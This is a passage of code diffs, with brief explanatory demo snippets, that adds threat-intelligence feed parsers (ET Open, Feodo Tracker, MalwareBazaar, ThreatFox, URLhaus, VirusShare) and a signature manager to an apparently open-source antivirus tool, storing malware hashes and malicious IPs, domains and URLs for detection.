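The `_rate_limit_wait` logic above can be sketched standalone: measure elapsed time on the monotonic clock and sleep only for the remainder of the window. A minimal copy with the window shortened to 50 ms so it runs quickly (helper name is illustrative):

```python
# Standalone sketch of the monotonic-clock rate limiter used by BaseFeed.
import time

def demo_rate_limit(window: float = 0.05) -> float:
    last = time.monotonic() - 10.0  # pretend the previous request was long ago
    stamps = []
    for _ in range(2):
        remaining = window - (time.monotonic() - last)
        if remaining > 0:
            time.sleep(remaining)  # only sleep off the unexpired remainder
        last = time.monotonic()
        stamps.append(last)
    return stamps[1] - stamps[0]  # gap between consecutive "requests"
```

The first iteration proceeds immediately (the window already elapsed); the second is delayed until the full window has passed.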


@@ -0,0 +1,124 @@
"""Emerging Threats (ET Open) feed for AYN Antivirus.
Parses community Suricata / Snort rules from Proofpoint's ET Open project
to extract IOCs (IP addresses and domains) referenced in active detection
rules.
Source: https://rules.emergingthreats.net/open/suricata/rules/
"""
from __future__ import annotations
import logging
import re
from typing import Any, Dict, List, Set
import requests
from ayn_antivirus.signatures.feeds.base_feed import BaseFeed
logger = logging.getLogger(__name__)
# We focus on the compromised-IP and C2 rule files.
_RULE_URLS = [
"https://rules.emergingthreats.net/open/suricata/rules/compromised-ips.txt",
"https://rules.emergingthreats.net/open/suricata/rules/botcc.rules",
"https://rules.emergingthreats.net/open/suricata/rules/ciarmy.rules",
"https://rules.emergingthreats.net/open/suricata/rules/emerging-malware.rules",
]
_TIMEOUT = 30
# Regex patterns to extract IPs and domains from rule bodies.
_RE_IPV4 = re.compile(r"\b(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\b")
_RE_DOMAIN = re.compile(
r'content:"([a-zA-Z0-9](?:[a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?'
r'(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?)*'
r'\.[a-zA-Z]{2,})"'
)
# Private / non-routable ranges to exclude from IP results.
_PRIVATE_PREFIXES = (
"10.", "127.", "172.16.", "172.17.", "172.18.", "172.19.",
"172.20.", "172.21.", "172.22.", "172.23.", "172.24.", "172.25.",
"172.26.", "172.27.", "172.28.", "172.29.", "172.30.", "172.31.",
"192.168.", "0.", "255.", "224.",
)
class EmergingThreatsFeed(BaseFeed):
"""Parse ET Open rule files to extract malicious IPs and domains."""
def get_name(self) -> str:
return "emergingthreats"
def fetch(self) -> List[Dict[str, Any]]:
"""Download and parse ET Open rules, returning IOC dicts.
Each dict has: ``ioc_type`` (``"ip"`` or ``"domain"``), ``value``,
``threat_name``, ``type``, ``source``.
"""
self._log("Downloading ET Open rule files")
all_ips: Set[str] = set()
all_domains: Set[str] = set()
for url in _RULE_URLS:
self._rate_limit_wait()
try:
resp = requests.get(url, timeout=_TIMEOUT)
resp.raise_for_status()
text = resp.text
except requests.RequestException as exc:
self._warn("Failed to fetch %s: %s", url, exc)
continue
# Extract IPs.
if url.endswith(".txt"):
# Plain text IP list (one per line).
for line in text.splitlines():
line = line.strip()
if not line or line.startswith("#"):
continue
match = _RE_IPV4.match(line)
if match:
ip = match.group(1)
if not ip.startswith(_PRIVATE_PREFIXES):
all_ips.add(ip)
else:
# Suricata rule file — extract IPs from rule body.
for ip_match in _RE_IPV4.finditer(text):
ip = ip_match.group(1)
if not ip.startswith(_PRIVATE_PREFIXES):
all_ips.add(ip)
# Extract domains from content matches.
for domain_match in _RE_DOMAIN.finditer(text):
domain = domain_match.group(1).lower()
# Filter out very short or generic patterns.
if "." in domain and len(domain) > 4:
all_domains.add(domain)
# Build result list.
results: List[Dict[str, Any]] = []
for ip in all_ips:
results.append({
"ioc_type": "ip",
"value": ip,
"threat_name": "ET.Compromised",
"type": "C2",
"source": "emergingthreats",
"details": "IP from Emerging Threats ET Open rules",
})
for domain in all_domains:
results.append({
"ioc_type": "domain",
"value": domain,
"threat_name": "ET.MaliciousDomain",
"type": "C2",
"source": "emergingthreats",
"details": "Domain extracted from ET Open Suricata rules",
})
self._log("Extracted %d IP(s) and %d domain(s)", len(all_ips), len(all_domains))
self._mark_updated()
return results
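The extraction step above reduces to: find IPv4 literals in rule text, then drop private/non-routable prefixes. A standalone sketch with a trimmed prefix list (names are illustrative):

```python
# Standalone sketch of the IP extraction + private-prefix filter above.
import re

_DEMO_RE_IPV4 = re.compile(r"\b(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\b")
_DEMO_PRIVATE = ("10.", "127.", "192.168.")  # trimmed for the demo

def demo_extract_ips(rule_text: str) -> list:
    return [
        ip for ip in _DEMO_RE_IPV4.findall(rule_text)
        if not ip.startswith(_DEMO_PRIVATE)
    ]

if __name__ == "__main__":
    print(demo_extract_ips("alert ip 10.0.0.5 any -> 203.0.113.9 any"))
```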


@@ -0,0 +1,73 @@
"""Feodo Tracker feed for AYN Antivirus.
Downloads the recommended IP blocklist from the abuse.ch Feodo Tracker
project. The list contains IP addresses of verified botnet C2 servers
(Dridex, Emotet, TrickBot, QakBot, etc.).
Source: https://feodotracker.abuse.ch/blocklist/
"""
from __future__ import annotations
import logging
from typing import Any, Dict, List
import requests
from ayn_antivirus.signatures.feeds.base_feed import BaseFeed
logger = logging.getLogger(__name__)
_BLOCKLIST_URL = "https://feodotracker.abuse.ch/downloads/ipblocklist_aggressive.txt"
_TIMEOUT = 30
class FeodoTrackerFeed(BaseFeed):
"""Fetch C2 server IPs from the Feodo Tracker blocklist."""
def get_name(self) -> str:
return "feodotracker"
def fetch(self) -> List[Dict[str, Any]]:
"""Download the recommended IP blocklist.
Returns a list of dicts, each with:
``ioc_type="ip"``, ``value``, ``threat_name``, ``type``, ``source``.
"""
self._rate_limit_wait()
self._log("Downloading Feodo Tracker IP blocklist")
try:
resp = requests.get(_BLOCKLIST_URL, timeout=_TIMEOUT)
resp.raise_for_status()
except requests.RequestException as exc:
self._error("Download failed: %s", exc)
return []
results: List[Dict[str, Any]] = []
for line in resp.text.splitlines():
line = line.strip()
if not line or line.startswith("#"):
continue
# Basic IPv4 validation.
parts = line.split(".")
if len(parts) != 4:
continue
try:
if not all(0 <= int(p) <= 255 for p in parts):
continue
except ValueError:
continue
results.append({
"ioc_type": "ip",
"value": line,
"threat_name": "Botnet.C2.Feodo",
"type": "C2",
"source": "feodotracker",
"details": "Verified botnet C2 IP from Feodo Tracker",
})
self._log("Fetched %d C2 IP(s)", len(results))
self._mark_updated()
return results
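The inline octet validation in the loop above can be extracted as a reusable predicate (hypothetical helper, same logic):

```python
# The inline IPv4 octet check from the Feodo parser, as a predicate.
def demo_is_ipv4(line: str) -> bool:
    parts = line.split(".")
    if len(parts) != 4:
        return False
    try:
        return all(0 <= int(p) <= 255 for p in parts)
    except ValueError:
        return False
```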


@@ -0,0 +1,174 @@
"""MalwareBazaar feed for AYN Antivirus.
Fetches recent malware sample hashes from the abuse.ch MalwareBazaar
CSV export (free, no API key required).
CSV export: https://bazaar.abuse.ch/export/
"""
from __future__ import annotations
import csv
import io
import logging
from typing import Any, Dict, List, Optional
import requests
from ayn_antivirus.signatures.feeds.base_feed import BaseFeed
logger = logging.getLogger(__name__)
_CSV_RECENT_URL = "https://bazaar.abuse.ch/export/csv/recent/"
_CSV_FULL_URL = "https://bazaar.abuse.ch/export/csv/full/"
_API_URL = "https://mb-api.abuse.ch/api/v1/"
_TIMEOUT = 60
class MalwareBazaarFeed(BaseFeed):
"""Fetch malware SHA-256 hashes from MalwareBazaar.
Uses the free CSV export by default; the authenticated JSON API
(``fetch_by_tag``) becomes available when an ``api_key`` is provided.
"""
def __init__(self, api_key: Optional[str] = None, **kwargs: Any) -> None:
super().__init__(**kwargs)
self.api_key = api_key
def get_name(self) -> str:
return "malwarebazaar"
def fetch(self) -> List[Dict[str, Any]]:
"""Fetch recent malware hashes from CSV export."""
return self._fetch_csv(_CSV_RECENT_URL)
def fetch_recent(self, hours: int = 24) -> List[Dict[str, Any]]:
"""Fetch recent samples.
The free CSV export always returns the last ~1000 samples, so the
``hours`` argument is currently ignored.
"""
return self._fetch_csv(_CSV_RECENT_URL)
def _fetch_csv(self, url: str) -> List[Dict[str, Any]]:
"""Download and parse the MalwareBazaar CSV export."""
self._rate_limit_wait()
self._log("Fetching hashes from %s", url)
try:
resp = requests.get(url, timeout=_TIMEOUT)
resp.raise_for_status()
except requests.RequestException as exc:
self._error("CSV download failed: %s", exc)
return []
results: List[Dict[str, Any]] = []
lines = [
line for line in resp.text.splitlines()
if line.strip() and not line.startswith("#")
]
reader = csv.reader(io.StringIO("\n".join(lines)))
for row in reader:
if len(row) < 8:
continue
# CSV columns:
# 0: first_seen, 1: sha256, 2: md5, 3: sha1,
# 4: reporter, 5: filename, 6: file_type, 7: mime_type,
# 8+: signature, ...
sha256 = row[1].strip().strip('"')
if not sha256 or len(sha256) != 64:
continue
filename = row[5].strip().strip('"') if len(row) > 5 else ""
file_type = row[6].strip().strip('"') if len(row) > 6 else ""
signature = row[8].strip().strip('"') if len(row) > 8 else ""
reporter = row[4].strip().strip('"') if len(row) > 4 else ""
threat_name = (
signature
if signature and signature not in ("null", "n/a", "None", "")
else f"Malware.{_map_type_name(file_type)}"
)
results.append({
"hash": sha256.lower(),
"threat_name": threat_name,
"threat_type": _map_type(file_type),
"severity": "HIGH",
"source": "malwarebazaar",
"details": (
f"file={filename}, type={file_type}, reporter={reporter}"
),
})
self._log("Parsed %d hash signature(s) from CSV", len(results))
self._mark_updated()
return results
def fetch_by_tag(self, tag: str) -> List[Dict[str, Any]]:
"""Fetch samples by tag (requires API key, falls back to empty)."""
if not self.api_key:
self._warn("fetch_by_tag requires API key")
return []
self._rate_limit_wait()
# The early return above guarantees api_key is set at this point.
payload = {"query": "get_taginfo", "tag": tag, "limit": 100, "api_key": self.api_key}
try:
resp = requests.post(_API_URL, data=payload, timeout=_TIMEOUT)
resp.raise_for_status()
data = resp.json()
except requests.RequestException as exc:
self._error("API request failed: %s", exc)
return []
if data.get("query_status") != "ok":
return []
results = []
for entry in data.get("data", []):
sha256 = entry.get("sha256_hash", "")
if not sha256:
continue
results.append({
"hash": sha256.lower(),
"threat_name": entry.get("signature") or f"Malware.{tag}",
"threat_type": _map_type(entry.get("file_type", "")),
"severity": "HIGH",
"source": "malwarebazaar",
"details": f"tag={tag}, file_type={entry.get('file_type', '')}",
})
self._mark_updated()
return results
def _map_type(file_type: str) -> str:
# Every recognised type currently maps to the generic MALWARE class;
# the branches below are kept as an extension point for finer categories.
ft = file_type.lower()
if any(x in ft for x in ("exe", "dll", "elf", "pe32")):
return "MALWARE"
if any(x in ft for x in ("doc", "xls", "pdf", "rtf")):
return "MALWARE"
if any(x in ft for x in ("script", "js", "vbs", "ps1", "bat", "sh")):
return "MALWARE"
return "MALWARE"
def _map_type_name(file_type: str) -> str:
"""Map file type to a readable threat name suffix."""
ft = file_type.lower().strip()
m = {
"exe": "Win32.Executable", "dll": "Win32.DLL", "msi": "Win32.Installer",
"elf": "Linux.ELF", "so": "Linux.SharedLib",
"doc": "Office.Document", "docx": "Office.Document",
"xls": "Office.Spreadsheet", "xlsx": "Office.Spreadsheet",
"pdf": "PDF.Document", "rtf": "Office.RTF",
"js": "Script.JavaScript", "vbs": "Script.VBScript",
"ps1": "Script.PowerShell", "bat": "Script.Batch",
"sh": "Script.Shell", "py": "Script.Python",
"apk": "Android.APK", "ipa": "iOS.IPA",
"app": "macOS.App", "pkg": "macOS.Pkg", "dmg": "macOS.DMG",
"rar": "Archive.RAR", "zip": "Archive.ZIP",
"7z": "Archive.7Z", "tar": "Archive.TAR", "gz": "Archive.GZ",
"iso": "DiskImage.ISO", "img": "DiskImage.IMG",
}
return m.get(ft, "Generic")
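All three abuse.ch parsers in this package share the same CSV pre-filtering: drop blank and `#`-comment lines, then hand the rest to `csv.reader`, which also strips the quoting. A standalone sketch of that shared step (helper name is illustrative):

```python
# The comment-stripping CSV parse shared by the abuse.ch feed parsers.
import csv
import io

def demo_parse_csv(text: str) -> list:
    lines = [
        line for line in text.splitlines()
        if line.strip() and not line.startswith("#")
    ]
    return list(csv.reader(io.StringIO("\n".join(lines))))

if __name__ == "__main__":
    sample = '# header comment\n"2024-01-01","deadbeef","exe"\n'
    print(demo_parse_csv(sample))
```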


@@ -0,0 +1,117 @@
"""ThreatFox feed for AYN Antivirus.
Fetches IOCs (IPs, domains, URLs, hashes) from the abuse.ch ThreatFox
CSV export (free, no API key required).
CSV export: https://threatfox.abuse.ch/export/
"""
from __future__ import annotations
import csv
import io
import logging
from typing import Any, Dict, List
import requests
from ayn_antivirus.signatures.feeds.base_feed import BaseFeed
logger = logging.getLogger(__name__)
_CSV_RECENT_URL = "https://threatfox.abuse.ch/export/csv/recent/"
_CSV_FULL_URL = "https://threatfox.abuse.ch/export/csv/full/"
_TIMEOUT = 60
class ThreatFoxFeed(BaseFeed):
"""Fetch IOCs from ThreatFox CSV export."""
def get_name(self) -> str:
return "threatfox"
def fetch(self) -> List[Dict[str, Any]]:
return self.fetch_recent()
def fetch_recent(self, days: int = 7) -> List[Dict[str, Any]]:
"""Fetch recent IOCs from the CSV export.
The export covers a fixed recency window, so ``days`` is currently
ignored.
"""
self._rate_limit_wait()
self._log("Fetching IOCs from CSV export")
try:
resp = requests.get(_CSV_RECENT_URL, timeout=_TIMEOUT)
resp.raise_for_status()
except requests.RequestException as exc:
self._error("CSV download failed: %s", exc)
return []
results: List[Dict[str, Any]] = []
lines = [l for l in resp.text.splitlines() if l.strip() and not l.startswith("#")]
reader = csv.reader(io.StringIO("\n".join(lines)))
for row in reader:
if len(row) < 6:
continue
# CSV: 0:first_seen, 1:ioc_id, 2:ioc_value, 3:ioc_type,
# 4:threat_type, 5:malware, 6:malware_alias,
# 7:malware_printable, 8:last_seen, 9:confidence,
# 10:reference, 11:tags, 12:reporter
ioc_value = row[2].strip().strip('"')
ioc_type_raw = row[3].strip().strip('"').lower()
threat_type = row[4].strip().strip('"') if len(row) > 4 else ""
malware = row[5].strip().strip('"') if len(row) > 5 else ""
malware_printable = row[7].strip().strip('"') if len(row) > 7 else ""
confidence = row[9].strip().strip('"') if len(row) > 9 else "0"
if not ioc_value:
continue
# Classify IOC type
ioc_type = _classify_ioc(ioc_type_raw, ioc_value)
threat_name = malware_printable or malware or "Unknown"
# Hash IOCs go into hash DB
if ioc_type == "hash":
results.append({
"hash": ioc_value.lower(),
"threat_name": threat_name,
"threat_type": "MALWARE",
"severity": "HIGH",
"source": "threatfox",
"details": f"threat={threat_type}, confidence={confidence}",
})
else:
clean_value = ioc_value
if ioc_type == "ip" and ":" in ioc_value:
clean_value = ioc_value.rsplit(":", 1)[0]
results.append({
"ioc_type": ioc_type,
"value": clean_value,
"threat_name": threat_name,
"type": threat_type or "C2",
"source": "threatfox",
"confidence": int(confidence) if confidence.isdigit() else 0,
})
self._log("Fetched %d IOC(s)", len(results))
self._mark_updated()
return results
def _classify_ioc(raw_type: str, value: str) -> str:
if "ip" in raw_type:
return "ip"
if "domain" in raw_type:
return "domain"
if "url" in raw_type:
return "url"
if "hash" in raw_type or "sha256" in raw_type or "md5" in raw_type:
return "hash"
if value.startswith("http://") or value.startswith("https://"):
return "url"
if len(value) == 64 and all(c in "0123456789abcdef" for c in value.lower()):
return "hash"
if ":" in value and value.replace(".", "").replace(":", "").isdigit():
return "ip"
return "domain"
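The value-shape fallbacks in `_classify_ioc` can be shown in isolation. A trimmed, standalone copy for illustration (the real function first consults the feed's declared `ioc_type`):

```python
# Trimmed copy of the fallback heuristics in _classify_ioc, for illustration.
def demo_classify(value: str) -> str:
    if value.startswith(("http://", "https://")):
        return "url"
    if len(value) == 64 and all(c in "0123456789abcdef" for c in value.lower()):
        return "hash"  # 64 hex chars => SHA-256
    if ":" in value and value.replace(".", "").replace(":", "").isdigit():
        return "ip"    # ip:port form
    return "domain"
```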


@@ -0,0 +1,131 @@
"""URLhaus feed for AYN Antivirus.
Fetches malicious URLs and payload hashes from the abuse.ch URLhaus
CSV/text exports (free, no API key required).
"""
from __future__ import annotations
import csv
import io
import logging
from typing import Any, Dict, List
import requests
from ayn_antivirus.signatures.feeds.base_feed import BaseFeed
logger = logging.getLogger(__name__)
_CSV_RECENT_URL = "https://urlhaus.abuse.ch/downloads/csv_recent/"
_TEXT_ONLINE_URL = "https://urlhaus.abuse.ch/downloads/text_online/"
_PAYLOAD_RECENT_URL = "https://urlhaus.abuse.ch/downloads/payloads_recent/"
_TIMEOUT = 60
class URLHausFeed(BaseFeed):
"""Fetch malware URLs and payload hashes from URLhaus."""
def get_name(self) -> str:
return "urlhaus"
def fetch(self) -> List[Dict[str, Any]]:
results = self.fetch_recent()
results.extend(self.fetch_payloads())
return results
def fetch_recent(self) -> List[Dict[str, Any]]:
"""Fetch recent malicious URLs from CSV export."""
self._rate_limit_wait()
self._log("Fetching recent URLs from CSV export")
try:
resp = requests.get(_CSV_RECENT_URL, timeout=_TIMEOUT)
resp.raise_for_status()
except requests.RequestException as exc:
self._error("CSV download failed: %s", exc)
return []
results: List[Dict[str, Any]] = []
lines = [l for l in resp.text.splitlines() if l.strip() and not l.startswith("#")]
reader = csv.reader(io.StringIO("\n".join(lines)))
for row in reader:
if len(row) < 4:
continue
# 0:id, 1:dateadded, 2:url, 3:url_status, 4:threat, 5:tags, 6:urlhaus_link, 7:reporter
url = row[2].strip().strip('"')
if not url or not url.startswith("http"):
continue
threat = row[4].strip().strip('"') if len(row) > 4 else ""
results.append({
"ioc_type": "url",
"value": url,
"threat_name": threat if threat and threat != "None" else "Malware.Distribution",
"type": "malware_distribution",
"source": "urlhaus",
})
self._log("Fetched %d URL(s)", len(results))
self._mark_updated()
return results
def fetch_payloads(self) -> List[Dict[str, Any]]:
"""Fetch recent payload hashes (SHA256) from URLhaus."""
self._rate_limit_wait()
self._log("Fetching payload hashes")
try:
resp = requests.get(_PAYLOAD_RECENT_URL, timeout=_TIMEOUT)
resp.raise_for_status()
except requests.RequestException as exc:
self._error("Payload download failed: %s", exc)
return []
results: List[Dict[str, Any]] = []
lines = [l for l in resp.text.splitlines() if l.strip() and not l.startswith("#")]
reader = csv.reader(io.StringIO("\n".join(lines)))
for row in reader:
if len(row) < 6:
continue
# 0:first_seen, 1:url, 2:file_type, 3:md5, 4:sha256, 5:signature
sha256 = row[4].strip().strip('"') if len(row) > 4 else ""
if not sha256 or len(sha256) != 64:
continue
sig = row[5].strip().strip('"') if len(row) > 5 else ""
results.append({
"hash": sha256.lower(),
"threat_name": sig if sig and sig != "None" else "Malware.URLhaus.Payload",
"threat_type": "MALWARE",
"severity": "HIGH",
"source": "urlhaus",
"details": f"file_type={row[2].strip()}" if len(row) > 2 else "",
})
self._log("Fetched %d payload hash(es)", len(results))
return results
def fetch_active(self) -> List[Dict[str, Any]]:
"""Fetch currently-active malware URLs."""
self._rate_limit_wait()
try:
resp = requests.get(_TEXT_ONLINE_URL, timeout=_TIMEOUT)
resp.raise_for_status()
except requests.RequestException as exc:
self._error("Download failed: %s", exc)
return []
results = []
for line in resp.text.splitlines():
line = line.strip()
if not line or line.startswith("#"):
continue
results.append({
"ioc_type": "url",
"value": line,
"threat_name": "Malware.Distribution.Active",
"type": "malware_distribution",
"source": "urlhaus",
})
self._log("Fetched %d active URL(s)", len(results))
self._mark_updated()
return results
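
The CSV handling above (skip blank and comment lines, re-parse with `csv.reader`, strip stray quotes) can be sketched in isolation. The sample row below is hypothetical but follows the column layout documented in the code:

```python
import csv
import io

# Hypothetical sample in the documented csv_recent layout:
# id, dateadded, url, url_status, threat, tags, urlhaus_link, reporter
sample = "\n".join([
    "# id,dateadded,url,url_status,threat,tags,urlhaus_link,reporter",
    '"1","2026-01-01","http://evil.example/payload.exe","online",'
    '"malware_download","exe","https://urlhaus.abuse.ch/url/1/","tester"',
])

# Same pre-filtering as fetch_recent(): drop blanks and comment lines.
lines = [ln for ln in sample.splitlines() if ln.strip() and not ln.startswith("#")]
entries = []
for row in csv.reader(io.StringIO("\n".join(lines))):
    if len(row) < 5:
        continue
    url = row[2].strip().strip('"')
    if not url.startswith("http"):
        continue
    entries.append({"ioc_type": "url", "value": url, "threat_name": row[4].strip()})

print(entries)
```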

View File

@@ -0,0 +1,114 @@
"""VirusShare feed for AYN Antivirus.
Downloads MD5 hash lists from VirusShare.com — one of the largest
free malware hash databases. Each list contains 65,536 MD5 hashes
of known malware samples (.exe, .dll, .rar, .doc, .pdf, .app, etc).
https://virusshare.com/hashes
"""
from __future__ import annotations
import logging
from pathlib import Path
from typing import Any, Dict, List
import requests
from ayn_antivirus.signatures.feeds.base_feed import BaseFeed
logger = logging.getLogger(__name__)
_BASE_URL = "https://virusshare.com/hashfiles/VirusShare_{:05d}.md5"
_TIMEOUT = 30
_STATE_FILE = "/var/lib/ayn-antivirus/.virusshare_last"
class VirusShareFeed(BaseFeed):
"""Fetch malware MD5 hashes from VirusShare.
Tracks the last downloaded list number so incremental updates
only fetch new lists.
"""
def __init__(self, **kwargs: Any) -> None:
super().__init__(**kwargs)
self._last_list = self._load_state()
def get_name(self) -> str:
return "virusshare"
def fetch(self) -> List[Dict[str, Any]]:
"""Fetch new hash lists since last update."""
return self.fetch_new_lists(max_lists=3)
def fetch_new_lists(self, max_lists: int = 3) -> List[Dict[str, Any]]:
"""Download up to max_lists new VirusShare hash files."""
results: List[Dict[str, Any]] = []
start = self._last_list + 1
fetched = 0
for i in range(start, start + max_lists):
self._rate_limit_wait()
url = _BASE_URL.format(i)
self._log("Fetching VirusShare_%05d", i)
try:
resp = requests.get(url, timeout=_TIMEOUT)
if resp.status_code == 404:
self._log("VirusShare_%05d not found — at latest", i)
break
resp.raise_for_status()
except requests.RequestException as exc:
self._error("Failed to fetch list %d: %s", i, exc)
break
hashes = [
line.strip()
for line in resp.text.splitlines()
if line.strip() and not line.startswith("#") and len(line.strip()) == 32
]
for h in hashes:
results.append({
"hash": h.lower(),
"threat_name": "Malware.VirusShare",
"threat_type": "MALWARE",
"severity": "HIGH",
"source": "virusshare",
"details": f"md5,list={i:05d}",
})
self._last_list = i
self._save_state(i)
fetched += 1
self._log("VirusShare_%05d: %d hashes", i, len(hashes))
self._log("Fetched %d list(s), %d total hashes", fetched, len(results))
if results:
self._mark_updated()
return results
def fetch_initial(self, start_list: int = 470, count: int = 11) -> List[Dict[str, Any]]:
"""Bulk download for initial setup."""
old = self._last_list
self._last_list = start_list - 1
results = self.fetch_new_lists(max_lists=count)
if not results:
self._last_list = old
return results
@staticmethod
def _load_state() -> int:
try:
return int(Path(_STATE_FILE).read_text().strip())
except Exception:
return 480 # Default: start after list 480
@staticmethod
def _save_state(n: int) -> None:
try:
Path(_STATE_FILE).write_text(str(n))
except Exception:
pass
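
The resume logic above boils down to a small load/bump/save cycle. A minimal sketch, using a temp file in place of the real `/var/lib/ayn-antivirus/.virusshare_last` state path:

```python
import tempfile
from pathlib import Path

# Demo state file (stand-in for /var/lib/ayn-antivirus/.virusshare_last).
state_file = Path(tempfile.gettempdir()) / "virusshare_demo_state"
state_file.unlink(missing_ok=True)  # start clean for the demo

def load_state(default: int = 480) -> int:
    try:
        return int(state_file.read_text().strip())
    except (OSError, ValueError):
        return default

def save_state(n: int) -> None:
    state_file.write_text(str(n))

start = load_state() + 1   # 481: first list this run would fetch
save_state(start + 2)      # pretend lists 481..483 downloaded fine
final = load_state()
print(start, final)        # → 481 483
state_file.unlink(missing_ok=True)
```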

View File

@@ -0,0 +1,320 @@
"""Signature manager for AYN Antivirus.
Orchestrates all threat-intelligence feeds, routes fetched entries into the
correct database (hash DB or IOC DB), and exposes high-level update /
status / integrity operations for the CLI and scheduler.
"""
from __future__ import annotations
import logging
import sqlite3
import threading
from datetime import datetime
from pathlib import Path
from typing import Any, Dict, List, Optional
from ayn_antivirus.config import Config
from ayn_antivirus.core.event_bus import EventType, event_bus
from ayn_antivirus.signatures.db.hash_db import HashDatabase
from ayn_antivirus.signatures.db.ioc_db import IOCDatabase
from ayn_antivirus.signatures.feeds.base_feed import BaseFeed
from ayn_antivirus.signatures.feeds.emergingthreats import EmergingThreatsFeed
from ayn_antivirus.signatures.feeds.feodotracker import FeodoTrackerFeed
from ayn_antivirus.signatures.feeds.malwarebazaar import MalwareBazaarFeed
from ayn_antivirus.signatures.feeds.threatfox import ThreatFoxFeed
from ayn_antivirus.signatures.feeds.urlhaus import URLHausFeed
from ayn_antivirus.signatures.feeds.virusshare import VirusShareFeed
logger = logging.getLogger(__name__)
class SignatureManager:
"""Central coordinator for signature / IOC updates.
Parameters
----------
config:
Application configuration.
db_path:
Override the database path from config.
"""
def __init__(
self,
config: Config,
db_path: Optional[str | Path] = None,
) -> None:
self.config = config
self._db_path = Path(db_path or config.db_path)
# Databases.
self.hash_db = HashDatabase(self._db_path)
self.ioc_db = IOCDatabase(self._db_path)
# Feeds — instantiated lazily so missing API keys don't crash init.
self._feeds: Dict[str, BaseFeed] = {}
self._init_feeds()
# Auto-update thread handle.
self._auto_update_stop = threading.Event()
self._auto_update_thread: Optional[threading.Thread] = None
# ------------------------------------------------------------------
# Feed registry
# ------------------------------------------------------------------
def _init_feeds(self) -> None:
"""Register the built-in feeds."""
api_keys = self.config.api_keys
self._feeds["malwarebazaar"] = MalwareBazaarFeed(
api_key=api_keys.get("malwarebazaar"),
)
self._feeds["threatfox"] = ThreatFoxFeed()
self._feeds["urlhaus"] = URLHausFeed()
self._feeds["feodotracker"] = FeodoTrackerFeed()
self._feeds["emergingthreats"] = EmergingThreatsFeed()
self._feeds["virusshare"] = VirusShareFeed()
@property
def feed_names(self) -> List[str]:
return list(self._feeds.keys())
# ------------------------------------------------------------------
# Update operations
# ------------------------------------------------------------------
def update_all(self) -> Dict[str, Any]:
"""Fetch from every registered feed and store results.
Returns a summary dict with per-feed statistics.
"""
self.hash_db.initialize()
self.ioc_db.initialize()
summary: Dict[str, Any] = {"feeds": {}, "total_new": 0, "errors": []}
for name, feed in self._feeds.items():
try:
stats = self._update_single(name, feed)
summary["feeds"][name] = stats
summary["total_new"] += stats.get("inserted", 0)
except Exception as exc:
logger.exception("Feed '%s' failed", name)
summary["feeds"][name] = {"error": str(exc)}
summary["errors"].append(name)
event_bus.publish(EventType.SIGNATURE_UPDATED, {
"source": "manager",
"feeds_updated": len(summary["feeds"]) - len(summary["errors"]),
"total_new": summary["total_new"],
})
logger.info(
"Signature update complete: %d feed(s), %d new entries, %d error(s)",
len(self._feeds),
summary["total_new"],
len(summary["errors"]),
)
return summary
def update_feed(self, feed_name: str) -> Dict[str, Any]:
"""Update a single feed by name.
Raises ``KeyError`` if *feed_name* is not registered.
"""
if feed_name not in self._feeds:
raise KeyError(f"Unknown feed: {feed_name!r} (available: {self.feed_names})")
self.hash_db.initialize()
self.ioc_db.initialize()
feed = self._feeds[feed_name]
stats = self._update_single(feed_name, feed)
event_bus.publish(EventType.SIGNATURE_UPDATED, {
"source": "manager",
"feed": feed_name,
"inserted": stats.get("inserted", 0),
})
return stats
def _update_single(self, name: str, feed: BaseFeed) -> Dict[str, Any]:
"""Fetch from one feed and route entries to the right DB."""
logger.info("Updating feed: %s", name)
entries = feed.fetch()
hashes_added = 0
ips_added = 0
domains_added = 0
urls_added = 0
# Classify and batch entries.
hash_rows = []
ip_rows = []
domain_rows = []
url_rows = []
for entry in entries:
ioc_type = entry.get("ioc_type")
if ioc_type is None:
# Hash-based entry (MalwareBazaar, URLhaus payloads, VirusShare).
hash_rows.append((
entry.get("hash", ""),
entry.get("threat_name", ""),
entry.get("threat_type", "MALWARE"),
entry.get("severity", "HIGH"),
entry.get("source", name),
entry.get("details", ""),
))
elif ioc_type == "ip":
ip_rows.append((
entry.get("value", ""),
entry.get("threat_name", ""),
entry.get("type", "C2"),
entry.get("source", name),
))
elif ioc_type == "domain":
domain_rows.append((
entry.get("value", ""),
entry.get("threat_name", ""),
entry.get("type", "C2"),
entry.get("source", name),
))
elif ioc_type == "url":
url_rows.append((
entry.get("value", ""),
entry.get("threat_name", ""),
entry.get("type", "malware_distribution"),
entry.get("source", name),
))
if hash_rows:
hashes_added = self.hash_db.bulk_add(hash_rows)
if ip_rows:
ips_added = self.ioc_db.bulk_add_ips(ip_rows)
if domain_rows:
domains_added = self.ioc_db.bulk_add_domains(domain_rows)
if url_rows:
urls_added = self.ioc_db.bulk_add_urls(url_rows)
total = hashes_added + ips_added + domains_added + urls_added
# Persist last-update timestamp.
self.hash_db.set_meta(f"feed_{name}_updated", datetime.utcnow().isoformat())
logger.info(
"Feed '%s': %d hashes, %d IPs, %d domains, %d URLs",
name, hashes_added, ips_added, domains_added, urls_added,
)
return {
"feed": name,
"fetched": len(entries),
"inserted": total,
"hashes": hashes_added,
"ips": ips_added,
"domains": domains_added,
"urls": urls_added,
}
# ------------------------------------------------------------------
# Status
# ------------------------------------------------------------------
def get_status(self) -> Dict[str, Any]:
"""Return per-feed last-update times and aggregate stats."""
self.hash_db.initialize()
self.ioc_db.initialize()
feed_status: Dict[str, Any] = {}
for name in self._feeds:
last = self.hash_db.get_meta(f"feed_{name}_updated")
feed_status[name] = {
"last_updated": last,
}
return {
"db_path": str(self._db_path),
"hash_count": self.hash_db.count(),
"hash_stats": self.hash_db.get_stats(),
"ioc_stats": self.ioc_db.get_stats(),
"feeds": feed_status,
}
# ------------------------------------------------------------------
# Auto-update
# ------------------------------------------------------------------
def auto_update(self, interval_hours: int = 6) -> None:
"""Start a background thread that periodically calls :meth:`update_all`.
Call :meth:`stop_auto_update` to stop the thread.
"""
if self._auto_update_thread and self._auto_update_thread.is_alive():
logger.warning("Auto-update thread is already running")
return
self._auto_update_stop.clear()
def _loop() -> None:
logger.info("Auto-update started (every %d hours)", interval_hours)
while not self._auto_update_stop.is_set():
try:
self.update_all()
except Exception:
logger.exception("Auto-update cycle failed")
self._auto_update_stop.wait(timeout=interval_hours * 3600)
